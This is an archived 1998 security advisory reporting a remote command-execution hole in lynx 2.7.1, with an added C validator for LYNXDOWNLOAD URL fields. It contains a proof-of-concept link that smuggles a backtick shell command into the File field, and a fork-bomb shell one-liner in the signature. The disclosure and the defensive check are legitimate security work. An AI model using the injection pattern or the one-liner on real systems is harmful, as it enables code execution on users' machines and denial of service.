Very, very ugly remote lynx 2.7.1 hole

From: Michal Zalewski (lcamtufat_private)
Date: Tue Mar 17 1998 - 07:27:29 PST


    While poking around lynx protocol handling routines, I found this very
    big, ugly remote hole:
    
    <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
    CLICK HERE
    </a>
    
    It allows remote execution of any code on the viewer's machine. Also, by
    setting the 'Method' field to 0 or more, you may crash lynx, but it isn't as
    exciting as the above URL. Also, it's possible to parse /dev/zero as 'File',
    also not funny.
    
    Greetings,
    _______________________________________________________________________
    Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    To iterate is human, to execute recursively - divine [P. Deutsch]
    =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
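
The Method, File and SugFile fields of the link in the message above arrive from the remote document, so they are untrusted input. The following is an added example, not part of the original message and not Lynx's own code, that percent-decodes and validates those fields before any handler uses them. The names check_lynxdownload, n_methods and tmp_dir, and the meaning given to Method values, are assumptions of this example.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
enum { LD_OK, LD_NOT_DOWNLOAD, LD_BAD_FORMAT, LD_BAD_METHOD, LD_BAD_FILE, LD_BAD_SUGFILE };

/* Decode %XX escapes in src[0..n) into dst; -1 on malformed escape, NUL byte or overflow. */
static int pct_decode(const char *src, size_t n, char *dst, size_t cap) {
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)src[i];
        if (c == '%') {
            if (i + 2 >= n || !isxdigit((unsigned char)src[i + 1]) ||
                !isxdigit((unsigned char)src[i + 2])) return -1;
            char hex[3] = { src[i + 1], src[i + 2], '\0' };
            c = (unsigned char)strtol(hex, NULL, 16);
            i += 2;
        }
        if (c == '\0' || o + 1 >= cap) return -1;
        dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 0;
}

/* Allowlist: plain path characters only, so backticks, $, ;, | and spaces never reach a shell. */
static int safe_value(const char *s) {
    if (*s == '\0' || *s == '-' || strstr(s, "..")) return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && !strchr("._/-", *s)) return 0;
    return 1;
}

/* Assumptions of this example: Method -1 names a built-in handler, values >= 0 index
 * n_methods configured downloaders, and File must be a temp file under tmp_dir. */
int check_lynxdownload(const char *url, int n_methods, const char *tmp_dir) {
    static const char scheme[] = "LYNXDOWNLOAD://";
    if (strncmp(url, scheme, sizeof scheme - 1) != 0) return LD_NOT_DOWNLOAD;
    const char *m = url + sizeof scheme - 1;
    const char *f = strstr(m, "/File=");
    const char *s = f ? strstr(f, "/SugFile=") : NULL;
    if (strncmp(m, "Method=", 7) != 0 || !f || !s) return LD_BAD_FORMAT;
    char *end, file[256], sug[256];
    long method = strtol(m + 7, &end, 10);
    if (end == m + 7 || end != f || method < -1 || method >= n_methods) return LD_BAD_METHOD;
    if (pct_decode(f + 6, (size_t)(s - (f + 6)), file, sizeof file) || !safe_value(file) ||
        strncmp(file, tmp_dir, strlen(tmp_dir)) != 0) return LD_BAD_FILE;
    if (pct_decode(s + 9, strlen(s + 9), sug, sizeof sug) || !safe_value(sug)) return LD_BAD_SUGFILE;
    return LD_OK;
}
```

With no downloaders configured (n_methods of 0) and a tmp_dir of "/tmp/lynx/", the link from the message is rejected with LD_BAD_FILE, a Method of 0 with LD_BAD_METHOD, and a File of /dev/zero with LD_BAD_FILE.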
    


